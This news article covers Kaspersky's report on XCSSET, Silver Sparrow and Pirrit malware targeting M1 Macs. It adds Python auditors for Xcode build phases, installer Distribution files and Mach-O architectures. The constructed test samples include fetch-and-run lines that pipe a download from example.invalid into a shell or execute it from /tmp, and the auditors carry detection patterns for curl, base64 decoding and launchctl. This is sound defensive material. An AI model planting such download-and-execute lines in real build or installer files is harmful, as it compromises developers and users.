How malware is targeting the new Apple Macs

As the new kid on the block, the M1 chip-based Mac is already on the radar of malware writers, says Kaspersky.

Cybercriminals often go after whatever technology is new, hoping to catch victims off guard, and the latest Macs are no exception. Unveiled in November 2020, the latest MacBook Air, 13-inch MacBook Pro and Mac mini are powered by Apple's M1 chip, marking Apple's shift away from Intel-based hardware. Beyond attracting buyers, the new platform is attracting malware writers eager to expand their range of targets.

In a report released Friday, security provider Kaspersky describes three malware threats to the M1 Mac—XCSSET malware, Silver Sparrow and Pirrit adware.

XCSSET malware

First discovered last year, XCSSET mainly targets Mac developers: it injects a malicious payload into Xcode projects on the victim's Mac, and the payload executes when the developer builds the project. Once running, the payload can read and dump Safari cookies, inject malicious JavaScript into websites, steal user files and data from apps such as Notes and Skype, and encrypt user files.

Examining XCSSET's executable modules, Kaspersky found a sample compiled for both Intel-based Macs and the new M1 systems. The sample was first uploaded on Feb. 24, which suggests this campaign is still ongoing, and Kaspersky takes it as a sign that more malware writers are recompiling their samples to run natively on the new Macs.
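The article says XCSSET's payload runs when a developer builds an infected project, but not how it is wired into the project. The most direct way to make arbitrary code run at build time is a run-script build phase in the project's project.pbxproj, so a developer's first check is to enumerate those phases and read what they execute. The script below is an added example written for this page, not Kaspersky's or the article's code: it does not detect XCSSET specifically, and the heuristics, the regular expressions and the constructed pbxproj excerpt are all assumptions of this example.

```python
import re
import sys

# Constructed project.pbxproj excerpt (not from any real or infected project).
# Real files are tab-indented; the parser does not care about indentation.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        0A1B2C3D4E5F60718293A4B5 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        0A1B2C3D4E5F60718293A4B6 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -fsSL https://example.invalid/u | base64 -d | sh &\n";
        };
    };
}
'''

# Xcode object IDs are 24 upper-case hex digits; the body of a phase runs from
# its "isa" line to the first "};" that closes the object.
PHASE_RE = re.compile(
    r'([0-9A-F]{24}) /\* (.*?) \*/ = \{\s*isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};',
    re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
PATH_RE = re.compile(r'shellPath = "?([^";]+)"?;')

# Heuristics (assumption of this example): behaviours a build script should
# rarely need and a planted payload usually does.
SUSPICIOUS = {
    "downloads code": re.compile(r'\b(curl|wget)\b'),
    "pipes into a shell": re.compile(r'\|\s*(sh|bash|zsh|python3?)\b'),
    "decodes an embedded blob": re.compile(r'base64\s+(-d|--decode)|xxd -r'),
    "runs AppleScript or eval": re.compile(r'\b(osascript|eval)\b'),
    "backgrounds a process": re.compile(r'&\s*$', re.M),
    "touches hidden paths": re.compile(r'/\.[A-Za-z0-9_]'),
}


def _unescape(s):
    # pbxproj strings use C-style escapes; map the ones that matter for reading
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def audit_pbxproj(text):
    """Return every run-script build phase with the heuristics it trips."""
    phases = []
    for obj_id, label, body in PHASE_RE.findall(text):
        m = SCRIPT_RE.search(body)
        script = _unescape(m.group(1)) if m else ""
        p = PATH_RE.search(body)
        phases.append({
            "id": obj_id,
            "name": label,
            "shell": p.group(1).strip() if p else "",
            "script": script,
            "flags": [why for why, rx in SUSPICIOUS.items() if rx.search(script)],
        })
    return phases


if __name__ == "__main__":
    # Usage: python audit_pbxproj.py path/to/Foo.xcodeproj/project.pbxproj ...
    # With no arguments the constructed sample above is audited.
    inputs = [(p, open(p, encoding="utf-8").read()) for p in sys.argv[1:]] \
        or [("sample", SAMPLE_PBXPROJ)]
    for name, text in inputs:
        for ph in audit_pbxproj(text):
            mark = "SUSPICIOUS" if ph["flags"] else "ok"
            print("%s: %s %s (%s) flags=%s" % (name, ph["id"], ph["name"], mark, ph["flags"]))
            print("    " + ph["script"].rstrip().replace("\n", "\n    "))
```

Every phase is printed, flagged or not, because an injected script can be as bland as a call to a hidden helper binary; the flags only prioritise what to read first. Run it across a workspace with `find . -name project.pbxproj -exec python audit_pbxproj.py {} +` and diff the output against a known-good checkout of the same project.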

Silver Sparrow

Silver Sparrow, a recently discovered threat, has already reached more than 30,000 Macs. Rather than hiding in the preinstall or postinstall scripts of an installer package, its payload is concealed in the package's Distribution XML file. The initial version targeted only the Intel x86_64 architecture, but the latest variant also targets arm64 on the M1 Macs, which Kaspersky reads as malware writers expanding their coverage.
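A package's Distribution file is not just metadata: it can declare a `hostArchitectures` list, and it can carry JavaScript that the installer evaluates during its own preflight checks, before any pre- or postinstall script runs. That is the space the article says Silver Sparrow hid in. The auditor below is an added example written for this page, not Kaspersky's or the article's code: it summarises which architectures a package claims, which JavaScript hooks the installer will call on its own, and whether that JavaScript invokes the Installer API's `system.run` / `system.runOnce` or contains strings an installation check has no reason to contain. Both Distribution documents are constructed for the example, and the string list is a heuristic assumption, not an indicator from any report.

```python
import sys
import xml.etree.ElementTree as ET

# Installer JavaScript API calls that execute a program from inside the
# installer's own checks.
EXEC_CALLS = ("system.run(", "system.runOnce(")
# Strings a legitimate installation check has no reason to contain
# (assumption of this example: a heuristic list, not a published indicator).
SUSPICIOUS_STRINGS = ("/bin/sh", "/bin/bash", "curl", "launchctl", "base64",
                      "/tmp/", "~/Library/", "LaunchAgents")
# <choice> attributes whose value may be a JavaScript expression the installer
# evaluates automatically instead of a literal true/false.
CHOICE_JS_ATTRS = ("visible", "enabled", "selected",
                   "start_visible", "start_enabled", "start_selected")


def audit_distribution(xml_text):
    """Summarise what a Distribution file will execute before any payload runs."""
    # Untrusted packages: prefer defusedxml.ElementTree, since the stdlib parser
    # expands internal entities without limits.
    root = ET.fromstring(xml_text)
    report = {"host_architectures": None, "hooks": {}, "script_chars": 0, "findings": []}
    opts = root.find("options")
    if opts is not None:
        report["host_architectures"] = opts.get("hostArchitectures")
    # Functions the installer calls by itself: the preflight checks ...
    for tag in ("installation-check", "volume-check"):
        el = root.find(tag)
        if el is not None and el.get("script"):
            report["hooks"][tag] = el.get("script")
    # ... and choice attributes that hold a function call rather than a literal.
    for choice in root.iter("choice"):
        for attr in CHOICE_JS_ATTRS:
            val = choice.get(attr)
            if val and "(" in val:
                report["hooks"]["choice:%s:%s" % (choice.get("id"), attr)] = val
    js = "\n".join(s.text or "" for s in root.iter("script"))
    report["script_chars"] = len(js)
    for call in EXEC_CALLS:
        if call in js:
            report["findings"].append("installer JavaScript calls %s)" % call)
    for needle in SUSPICIOUS_STRINGS:
        if needle in js:
            report["findings"].append("installer JavaScript contains %r" % needle)
    return report


# Constructed Distribution files (not taken from any real package).
CLEAN_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
  <title>Example Tool</title>
  <options customize="never" hostArchitectures="x86_64"/>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="Example Tool"><pkg-ref id="com.example.tool"/></choice>
  <pkg-ref id="com.example.tool" version="1.0">#tool.pkg</pkg-ref>
</installer-gui-script>
"""

SCRIPTED_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
  <title>Example Updater</title>
  <options customize="never" hostArchitectures="x86_64,arm64"/>
  <installation-check script="install_check()"/>
  <script>
  function install_check() {
    // evaluated during the installer's preflight, before any postinstall script
    system.run("/bin/sh", "-c",
      "curl -fsSL https://example.invalid/a -o /tmp/agent; chmod +x /tmp/agent; /tmp/agent");
    return true;
  }
  </script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="Example Updater" visible="true"><pkg-ref id="com.example.updater"/></choice>
  <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>
"""

if __name__ == "__main__":
    # Usage: pkgutil --expand Some.pkg out && python audit_distribution.py out/Distribution
    # With no arguments both constructed samples are audited.
    inputs = [(p, open(p, encoding="utf-8").read()) for p in sys.argv[1:]] \
        or [("clean", CLEAN_DISTRIBUTION), ("scripted", SCRIPTED_DISTRIBUTION)]
    for name, text in inputs:
        r = audit_distribution(text)
        print("%s: archs=%s hooks=%s script_chars=%d" % (
            name, r["host_architectures"], r["hooks"], r["script_chars"]))
        for f in r["findings"]:
            print("    " + f)
```

The `hostArchitectures` value is the package author's claim, not proof of what the payload can do; confirm it by checking the architectures of the Mach-O files the package actually installs. A Distribution file that declares an `installation-check` hook and contains no `<script>` element at all is worth a look too, since the function then has to come from somewhere else.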

Pirrit adware

Pirrit, an old and notorious adware family documented by Mac malware researcher Patrick Wardle, can now run natively on the M1 Mac as well as on Intel-based Macs. The symptoms are unchanged: an infected system serves up pop-ups, banners and other intrusive ads.

Targeting the M1 Mac

According to Kaspersky, Macs with the M1 chip are no more and no less vulnerable than Intel-based Macs. The main difference between the two is the CPU architecture, which means malware writers typically have to recompile their code (or ship it as a universal binary with both x86_64 and arm64 slices) for it to run natively on the new machines. Rather, the appeal of the M1 Mac lies in its novelty.

"As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it," Kaspersky said in its report. "Malware developers are no exception."

Malware written for Intel-based Macs can still run on an M1 Mac, however. Through the Rosetta 2 translation layer, M1 Macs remain backward compatible in certain ways and can execute malicious code built exclusively for the Intel x86_64 architecture, Kaspersky said; an Intel-only sample therefore still runs on the new hardware, just not natively. Kaspersky expects malware writers to keep leaning on this compatibility until Apple completes the shift to its own chips.
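The practical question behind the XCSSET and Silver Sparrow paragraphs above and this one is the same: does a given binary carry an arm64 slice (native on M1), only an x86_64 slice (runs, but under Rosetta 2), or neither? Apple's `lipo -archs` and `file` answer it on a Mac; the parser below is an added example written for this page, not Kaspersky's or the article's code, for reading the same answer off the Mach-O headers anywhere Python runs. It walks the big-endian fat header, cross-checks each slice's own header against the table entry, and rejects Java class files, which share the `CAFEBABE` magic. The two sample images are constructed headers with no load commands, not real binaries, and the 64-bit fat format (`CAFEBABF`) is assumed out of scope.

```python
import struct
import sys

FAT_MAGIC = 0xCAFEBABE        # universal ("fat") file; header is big-endian
MH_MAGIC = 0xFEEDFACE         # 32-bit Mach-O header
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit Mach-O header
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86 = 7
CPU_TYPE_ARM = 12
CPU_NAMES = {
    CPU_TYPE_X86: "i386",
    CPU_TYPE_X86 | CPU_ARCH_ABI64: "x86_64",
    CPU_TYPE_ARM: "arm",
    CPU_TYPE_ARM | CPU_ARCH_ABI64: "arm64",
}


def _cpu_name(cputype):
    cputype &= 0xFFFFFFFF
    return CPU_NAMES.get(cputype, "cputype=0x%08x" % cputype)


def mach_o_archs(data):
    """List the CPU architectures in a Mach-O image (thin or universal).

    Raises ValueError for anything that is not Mach-O. The 64-bit fat
    format (magic 0xCAFEBABF, 32-byte entries) is not handled here.
    """
    if len(data) < 8:
        raise ValueError("too short to be Mach-O")
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        # A Java class file puts its version here (e.g. 52); no real fat file
        # has that many slices, so treat large counts as not-Mach-O.
        if nfat == 0 or nfat > 20:
            raise ValueError("CAFEBABE magic but implausible slice count")
        if len(data) < 8 + 20 * nfat:
            raise ValueError("truncated fat header")
        archs = []
        for i in range(nfat):
            off = 8 + i * 20                     # sizeof(struct fat_arch) == 20
            cputype, _sub, offset, size, _align = struct.unpack(">iIIII", data[off:off + 20])
            if offset + size > len(data):
                raise ValueError("slice %d runs past end of file" % i)
            # Don't trust the table alone: the slice's own header must agree,
            # or the file is lying about what it contains.
            inner = mach_o_archs(data[offset:offset + size])
            if inner != [_cpu_name(cputype)]:
                raise ValueError("slice %d: header says %s, fat_arch says %s"
                                 % (i, inner, _cpu_name(cputype)))
            archs.append(_cpu_name(cputype))
        return archs
    for order in ("<", ">"):                     # thin file: magic in target byte order
        magic, cputype = struct.unpack(order + "Ii", data[:8])
        if magic in (MH_MAGIC, MH_MAGIC_64):
            return [_cpu_name(cputype)]
    raise ValueError("not a Mach-O file")


def is_mach_o(data):
    try:
        mach_o_archs(data)
        return True
    except ValueError:
        return False


def m1_execution_mode(archs):
    """How a binary with these slices executes on an M1 Mac."""
    if "arm64" in archs:
        return "native on Apple silicon"
    if "x86_64" in archs:
        return "x86_64 only: runs under Rosetta 2 translation"
    return "does not run on Apple silicon"


# --- constructed samples (not real binaries): headers with no load commands ---
def _thin_header(cputype):
    # struct mach_header_64: magic, cputype, cpusubtype, filetype (MH_EXECUTE=2),
    # ncmds, sizeofcmds, flags, reserved; x86_64 and arm64 are little-endian.
    return struct.pack("<IiIIIIII", MH_MAGIC_64, cputype, 3, 2, 0, 0, 0, 0)


def _fat_binary(cputypes):
    # Real fat files page-align each slice; the parser does not depend on that.
    slices = [_thin_header(ct) for ct in cputypes]
    header = struct.pack(">II", FAT_MAGIC, len(cputypes))
    offset = 8 + 20 * len(cputypes)
    for ct, s in zip(cputypes, slices):
        header += struct.pack(">iIIII", ct, 3, offset, len(s), 0)
        offset += len(s)
    return header + b"".join(slices)


INTEL_ONLY = _thin_header(CPU_TYPE_X86 | CPU_ARCH_ABI64)
UNIVERSAL = _fat_binary([CPU_TYPE_X86 | CPU_ARCH_ABI64, CPU_TYPE_ARM | CPU_ARCH_ABI64])

if __name__ == "__main__":
    # Usage: python mach_o_archs.py /path/to/binary ...  (no args: the samples above)
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] \
        or [("sample-intel", INTEL_ONLY), ("sample-universal", UNIVERSAL)]
    for name, blob in targets:
        try:
            archs = mach_o_archs(blob)
            print("%-20s %-14s %s" % (name, ",".join(archs), m1_execution_mode(archs)))
        except ValueError as e:
            print("%-20s not Mach-O (%s)" % (name, e))
```

The slice cross-check matters for triage: a fat table can claim one architecture while the bytes at that offset are something else, and a parser that reports only the table would miscount what a sample can run on. Whatever the result, an x86_64-only verdict means "still runs on M1", not "harmless on M1".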

Recommendations

To help you protect your Mac from malware, Evgeny Lopatin, malware analyst team lead at Kaspersky, offers the following tips:

  • Always check the source an application was downloaded from. Malicious code is more likely to be hosted on a third-party website than at Apple's Mac App Store.
  • Keep your Mac updated. Apple regularly pushes security improvements for the Mac to patch any security flaws in macOS that are being abused by malware adversaries.
  • Regularly make file backups. If your Mac gets encrypted by malware, you'll still be able to restore your files from a backup.
  • Use security software to secure your devices from Trojans, ransomware, and other threats.
